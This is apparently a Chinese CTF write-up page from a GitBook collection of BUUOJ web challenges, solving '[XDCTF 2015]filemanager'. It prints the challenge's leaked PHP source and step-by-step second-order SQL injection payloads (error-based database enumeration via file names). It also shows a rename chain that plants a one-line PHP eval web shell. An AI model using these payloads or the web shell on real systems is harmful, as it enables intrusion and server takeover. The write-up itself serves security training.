🤤
BUUOJwp
  • README
  • SQL注入
    • [BSidesCF 2019]Sequel
    • [RCTF2015]EasySQL
    • [RootersCTF2019]babyWeb
    • [SUCTF 2018]MultiSQL
    • October 2019 Twice SQL Injection
    • [Black Watch 入群题]Web
    • [网鼎杯2018]Unfinish
    • [NCTF2019]SQLi
    • [CISCN2019 华北赛区 Day1 Web5]CyberPunk
    • [WUSTCTF2020]颜值成绩查询
    • [强网杯 2019]随便注
    • [b01lers2020]Life on Mars
    • [CISCN2019 华北赛区 Day2 Web1]Hack World
    • [SUCTF 2019]EasySQL
    • [GXYCTF2019]BabySQli
    • [GYCTF2020]Ezsqli
    • [极客大挑战 2019]EasySQL
    • [极客大挑战 2019]LoveSQL
    • [极客大挑战 2019]BabySQL
    • [极客大挑战 2019]HardSQL
    • [极客大挑战 2019]FinalSQL
    • [RoarCTF 2019]Online Proxy
    • [BJDCTF2020]Easy MD5
    • [BJDCTF 2nd]简单注入
    • [网鼎杯 2018]Comment
    • [SWPU2019]Web1
    • [GYCTF2020]Blacklist
    • [SWPU2019]Web4
    • [HarekazeCTF2019]Sqlite Voting
    • [XDCTF 2015]filemanager
    • [FBCTF2019]Products Manager
    • [PwnThyBytes 2019]Baby_SQL
    • [Zer0pts2020]phpNantokaAdmin
    • [NPUCTF2020]ezlogin
  • 命令执行/代码执行
    • [De1CTF 2019]Giftbox
    • Wallbreaker_Easy
    • [GXYCTF2019]禁止套娃
    • [CISCN 2019 初赛]Love Math
    • [NESTCTF 2019]Love Math 2
    • [ISITDTU 2019]EasyPHP
    • [红明谷CTF 2021]write_shell
    • 未完成[RoarCTF 2019]Easy Calc
    • [极客大挑战 2019]RCE ME
    • EasyBypass
    • [FBCTF2019]RCEService
    • [ACTF2020 新生赛]Exec
    • [HITCON 2017]SSRFme
    • [GXYCTF2019]Ping Ping Ping
    • [SUCTF 2018]GetShell
  • XXE
    • [NCTF2019]Fake XML cookbook
    • [NCTF2019]True XML cookbook
    • [CSAWQual 2019]Web_Unagi
    • [BSidesCF 2019]SVGMagic
    • [GoogleCTF2019 Quals]Bnv
  • SSRF
    • [网鼎杯 2020 玄武组]SSRFMe
  • XSS
    • [CISCN2019 华东北赛区]Web2
    • [GWCTF 2019]mypassword
  • SSTI
    • PHP
      • [CISCN2019 华东南赛区]Web11
      • [BJDCTF2020]The mystery of ip
      • [BJDCTF2020]Cookie is so stable
    • Python
      • [GWCTF 2019]你的名字
      • [pasecactf_2019]flask_ssti
      • [FBCTF2019]Event
      • [RootersCTF2019]I_<3_Flask
      • [CSCCTF 2019 Qual]FlaskLight
      • [GYCTF2020]FlaskApp
      • [WesternCTF2018]shrine
      • [护网杯 2018]easy_tornado
  • 文件上传
    • [HarekazeCTF2019]Avatar Uploader 1
    • [SUCTF 2019]CheckIn
    • [WUSTCTF2020]CV Maker
    • [MRCTF2020]你传你🐎呢
    • [GXYCTF2019]BabyUpload
    • [极客大挑战 2019]Upload
    • [ACTF2020 新生赛]Upload
    • [XNUCA2019Qualifier]EasyPHP
    • [羊城杯2020]easyphp
    • [SUCTF 2019]EasyWeb
  • PHP
    • Laravel
      • 未完成[CISCN2019 总决赛 Day1 Web4]Laravel1
    • PHP特性
      • [RCTF 2019]Nextphp
      • [WMCTF2020]Make PHP Great Again
      • [HarekazeCTF2019]encode_and_encode
      • [安洵杯 2019]easy_web
      • [Zer0pts2020]Can you guess it?
      • [WUSTCTF2020]朴实无华
      • [BJDCTF2020]Mark loves cat
      • [MRCTF2020]Ez_bypass
      • [GWCTF 2019]枯燥的抽奖
      • [MRCTF2020]Ezaudit
      • [BJDCTF2020]EzPHP
      • [NPUCTF2020]ReadlezPHP
      • [BSidesCF 2020]Had a bad day
      • [GWCTF 2019]我有一个数据库
      • [ACTF2020 新生赛]Include
      • [HCTF 2018]WarmUp
      • [SUCTF 2018]annonymous
      • [极客大挑战 2020]Roamphp1 Welcome
      • [网鼎杯 2020 半决赛]AliceWebsite
      • [ACTF2020 新生赛]BackupFile
      • [极客大挑战 2019]BuyFlag
      • [羊城杯 2020]Blackcat
      • [羊城杯 2020]Easyphp2
      • [羊城杯 2020]EasySer
    • PHP反序列化
      • [MRCTF2020]Ezpop_Revenge
      • [HarekazeCTF2019]Easy Notes
      • bestphp's revenge
      • [SUCTF 2019]Upload Labs 2
      • [SWPUCTF2018] SimplePHP
      • [CISCN2019 华北赛区 Day1 Web1]Dropbox
      • [0CTF 2016]piapiapia
      • [安洵杯 2019]easy_serialize_php
      • [GYCTF2020]Easyphp
      • [极客大挑战 2019]PHP
      • [网鼎杯 2020 青龙组]AreUSerialz
      • [BJDCTF2020]ZJCTF,不过如此
      • [EIS 2019]EzPOP
      • [2020 新春红包题]1
      • [MRCTF2020]Ezpop
      • [ZJCTF 2019]NiZhuanSiWei
    • ThinkPHP
      • [安洵杯 2019]iamthinking
      • [GYCTF2020]EasyThinking
      • [BJDCTF 2nd]old-hack
      • [RoarCTF 2019]Simple Upload
    • PHP综合
      • [网鼎杯 2020 总决赛]Game Exp
      • [HITCON 2017]Baby^h Master PHP
      • [HFCTF2020]BabyUpload
      • [NPUCTF2020]ezinclude
      • [MRCTF2020]套娃
      • [BUUCTF 2018]Online Tool
      • [网鼎杯 2020 朱雀组]Nmap
      • [网鼎杯 2020 朱雀组]phpweb
      • [网鼎杯 2018]Fakebook
      • [强网杯 2019] UPLOAD
      • [CISCN2019 总决赛 Day2 Web1]Easyweb
      • [GKCTF 2021]easycms
      • [GXYCTF2019]BabysqliV3.0
      • [N1CTF 2018]eating_cms
      • [安洵杯 2019]不是文件上传
      • [极客大挑战 2020]Greatphp
      • [极客大挑战 2020]Roamphp2-Myblog
      • [蓝帽杯 2021]One Pointer PHP
      • [BJDCTF2020]EzPHP
      • [CISCN2021 Quals]upload
  • Python
    • 逻辑漏洞
      • [DDCTF 2019]homebrew event loop
      • [CISCN2019 华北赛区 Day1 Web2]ikun
    • Flask
      • [HCTF 2018]Hideandseek
      • [SWPU2019]Web3
      • [watevrCTF-2019]Supercalc
      • [HCTF 2018]admin
      • [De1CTF 2019]SSRF Me
      • [CISCN2019 总决赛 Day1 Web3]Flask Message Board(*)
      • [CISCN2019 华东南赛区]Web4
      • [CISCN2019 华东南赛区]Double Secret
      • [网鼎杯 2020 白虎组]PicDown
      • [PASECA2019]honey_shop
      • [HFCTF 2021 Final]easyflask
    • 反序列化
      • [watevrCTF-2019]Pickle Store
  • Java
    • [网鼎杯 2020 朱雀组]Think Java
    • [NPUCTF2020]web🐕
    • [网鼎杯 2020 青龙组]filejava
    • [RoarCTF 2019]Easy Java
  • JavaScript
    • [GYCTF2020]Ez_Express
    • [网鼎杯 2020 青龙组]notes
    • [NPUCTF2020]验证🐎
    • [GYCTF2020]Node Game
    • [HITCON 2016]Leaking
    • [HFCTF2020]JustEscape
    • [FireshellCTF2020]ScreenShooter
    • [HFCTF2020]EasyLogin
  • 未分类
    • Unicode安全性
      • [SUCTF 2019]Pythonginx
      • [ASIS 2019]Unicorn shop
    • HTTP问题
      • [极客大挑战 2019]Secret File
      • [极客大挑战 2019]Http
      • [MRCTF2020]PYWebsite
      • [BSidesCF 2019]Kookie
      • [BSidesCF 2020]Hurdles
      • [watevrCTF-2019]Cookie Store
    • [b01lers2020]Space Noodles
    • [BSidesCF 2020]Cards
    • [BSidesCF 2019]Mixer
    • [BSidesCF 2019]Pick Tac Toe
    • [BSidesCF 2019]Futurella
    • [RootersCTF2019]ImgXweb
    • [CSAWQual 2016]i_got_id
    • [Windows][HITCON 2019]Buggy_Net
    • [极客大挑战 2019]Knife
    • [极客大挑战 2019]Havefun
    • [GXYCTF2019]StrongestMind
    • [b01lers2020]Welcome to Earth
    • [FireshellCTF2020]Caas
    • [BJDCTF2020]EasySearch
    • [SCTF2019]Flag Shop
    • [强网杯 2019]高明的黑客
    • virink_2019_files_share
由 GitBook 提供支持
在本页
  • [XDCTF 2015]filemanager
  • 考点
  • wp
  • 验证存在注入
  • 做法
在GitHub上编辑
  1. SQL注入

[XDCTF 2015]filemanager

上一页[HarekazeCTF2019]Sqlite Voting下一页[FBCTF2019]Products Manager

最后更新于3年前

[XDCTF 2015]filemanager

考点

  • 代码审计

  • 二次注入

wp

三个功能,文件上传、删除文件和重命名文件

直接点删除文件发现报了SQL的错,有可能是文件名处的注入

目录扫描发现www.tar.gz源码泄露

在common.inc.php进行一些初始赋值,连接xdctf数据库,并把传入的数据进行addslashes转义,然后定义上传路径为./upload,最后定义redirect()函数

common.inc.php
<?php
$DATABASE = array(

	"host" => "127.0.0.1",
	"username" => "root",
	"password" => "ayshbdfuybwayfgby",
	"dbname" => "xdctf",
);
$db = new mysqli($DATABASE['host'], $DATABASE['username'], $DATABASE['password'], $DATABASE['dbname']);
$req = array();
foreach (array($_GET, $_POST, $_COOKIE) as $global_var) {
	foreach ($global_var as $key => $value) {
		is_string($value) && $req[$key] = addslashes($value);
	}}
define("UPLOAD_DIR", "upload/");
function redirect($location) {
	header("Location: {$location}");
	exit;}

在upload.php中,获取上传文件。先用basename()获取带有拓展名的文件名,再用pathinfo()获取文件名中的dirname,basename,extension,filename数组,赋值为$path_parts。然后要后缀名在["gif", "jpg", "png", "zip", "txt"]中,之后对文件名进行重新拼接,再用addslashes()对$path_parts["filename"]进行转义。根据$path_parts['filename']和$path_parts['extension']查询文件是否已经存在。然后把$path_parts['filename']和$path_parts['extension']插入xdctf数据库的file表。

upload.php
<?php
require_once "common.inc.php";
if ($_FILES) {
	$file = $_FILES["upfile"];
	if ($file["error"] == UPLOAD_ERR_OK) {
		$name = basename($file["name"]);
		$path_parts = pathinfo($name);
		if (!in_array($path_parts["extension"], array("gif", "jpg", "png", "zip", "txt"))) {
			exit("error extension");
		}
		$path_parts["extension"] = "." . $path_parts["extension"];
		$name = $path_parts["filename"] . $path_parts["extension"];
		$path_parts['filename'] = addslashes($path_parts['filename']);
		$sql = "select * from `file` where `filename`='{$path_parts['filename']}' and `extension`='{$path_parts['extension']}'";
		$fetch = $db->query($sql);
		if ($fetch->num_rows > 0) { exit("file is exists"); }
		if (move_uploaded_file($file["tmp_name"], UPLOAD_DIR . $name)) {
			$sql = "insert into `file` ( `filename`, `view`, `extension`) values( '{$path_parts['filename']}', 0, '{$path_parts['extension']}')";
			$re = $db->query($sql);
			if (!$re) { print_r($db->error);exit; }
			$url = "/" . UPLOAD_DIR . $name;
			echo "Your file is upload, url:
                	<a href=\"{$url}\" target='_blank'>{$url}</a><br/>
               		<a href=\"/\">go back</a>";
		} else { exit("upload error"); }
	} else { print_r(error_get_last());exit;}
}

在delete.php中首先查询filename是否存在,然后使用delete语句删除数据库记录,最后使用unlink()函数删除文件。

delete.php
<?php
require_once "common.inc.php";
if(isset($req['filename'])) {
    $result = $db->query("select * from `file` where `filename`='{$req['filename']}'");
    if ($result->num_rows>0){
        $result = $result->fetch_assoc();
    }
    $filename = UPLOAD_DIR . $result["filename"] . $result["extension"];
    if ($result && file_exists($filename)) {
        $db->query('delete from `file` where `fid`=' . $result["fid"]);
        unlink($filename);
        redirect("/");
    }
}
?>

在rename.php中首先查询old_name是否存在,然后使用update语句更新数据库,如果更新错误会回显,最后使用rename()函数重命名。

rename.php
<?php
require_once "common.inc.php";
if (isset($req['oldname']) && isset($req['newname'])) {
	$result = $db->query("select * from `file` where `filename`='{$req['oldname']}'");
	if ($result->num_rows > 0) {
		$result = $result->fetch_assoc();
	} else { exit("old file doesn't exists!"); }
	if ($result) {
		$req['newname'] = basename($req['newname']);
		$re = $db->query("update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}");
		if (!$re) { print_r($db->error);exit; }
		$oldname = UPLOAD_DIR . $result["filename"] . $result["extension"];
		$newname = UPLOAD_DIR . $req["newname"] . $result["extension"];
		if (file_exists($oldname)) { rename($oldname, $newname); }
		$url = "/" . $newname;
		echo "Your file is rename, url:
                <a href=\"{$url}\" target='_blank'>{$url}</a><br/>
                <a href=\"/\">go back</a>";
	}
}
?>

上传文件名aaa'.txt,执行的语句是insert into `file` ( `filename`, `view`, `extension`) values( 'aaa\'', 0, 'txt')

在rename处查询文件是否存在,执行的是select * from `file` where `filename`='aaa\''

更新文件名处执行的语句是update `file` set `filename`='bbbb', `oldname`='aaaa'' where `fid`=5,所以这里的报错是near ''aaaa'' where `fid`=5' at line 1

验证存在注入

首先根据前面的报错,判断当前文件的fid是6,再上传一个文件dddd.txt,它的fid就是7,再上传文件名dddd' where fid=7#

然后rename处的oldname输入dddd'%20where%20fid=7#,newname输入ddddx

那么renameSQL语句先执行select * from file where filename='dddd\' where fid=7#'

这个文件是存在的,再update执行语句update file set filename='ddddx', oldname='dddd' where fid=7#' where fid=8

这就利用第8次上传把dddd的文件名给修改为ddddx了

注入步骤

  1. 上传f.txt文件,假设fid为15

  2. 上传f' where fid=9 and updatexml(1,concat(0x3a,(select(group_concat(schema_name))from(information_schema.schemata))),1)#.txt文件

  3. rename处oldname输入f'%20where%20fid=9%20and%20updatexml(1,concat(0x3a,(select(group_concat(schema_name))from(information_schema.schemata))),1)#,newname随便输,得到所有数据库,information_schema,mysql,perfor,再逆序一下就可以得到所有数据库,information_schema,mysql,performance_schema,test,xdctf

做法

不是注入,那就是改后缀名了getshell。

需要执行rename('upload/shell.txt', 'upload/shell.php'),也就是要让这两句分别返回upload/shell.txt和upload/shell.php

$oldname = UPLOAD_DIR . $result["filename"] . $result["extension"];
$newname = UPLOAD_DIR . $req["newname"] . $result["extension"];

那么需要数据库中的extension为空,filename为shell.txt

那么需要执行的语句就是update file set filename='shell.php', oldname='shell.txt',extension='' where fid=1#' where fid=1

  1. 先上传shell.txt,fid为1,内容为一句话<?php eval($_POST[a]);?>

  2. 上传shell.txt',extension='' where fid=1#.txt

  3. 重命名shell.txt',extension=''%20where%20fid=1#为shell.php

  4. 再重命名shell.php为shell.php.txt

  5. 再重命名shell.php.txt为shell.php

一开始上传shell.txt数据库如下

fid
filename
oldname
view
extension
1

shell

0

.txt

再上传shell.txt',extension='' where fid=1#.txt数据库如下

fid
filename
oldname
view
extension
1

shell

0

.txt

2

shell.txt',extension='' where fid=1#

.txt

此时upload目录下只有两个文件,shell.txt和shell.txt',extension='' where fid=1#.txt

重命名shell.txt',extension=''%20where%20fid=1#为shell.php

首先select获取的oldname数据也就是shell.txt',extension=''%20where%20fid=1#的后缀为.txt

然后执行update,update file set filename='shell.php', oldname='shell.txt',extension='' where fid=1#' where fid=2

再进行rename,把shell.txt',extension=''%20where%20fid=1#.txt重命名为newname+extension,也就是shell.php.txt,现在upload目录有两个文件,shell.php.txt和shell.txt

fid
filename
oldname
view
extension
1

shell.php

shell.txt

0

2

shell.txt',extension='' where fid=1#

0

.txt

再进行重命名,oldname=shell.php&newname=shell.php.txt,这样upload目录还是有两个文件,shell.php.txt和shell.txt

fid
filename
oldname
view
extension
1

shell.php.txt

shell.php

0

2

shell.txt',extension='' where fid=1#

0

.txt

然后再进行重命名,oldname=shell.php.txt&newname=shell.php,在执行rename函数就可以把shell.php.txt变成shell.php了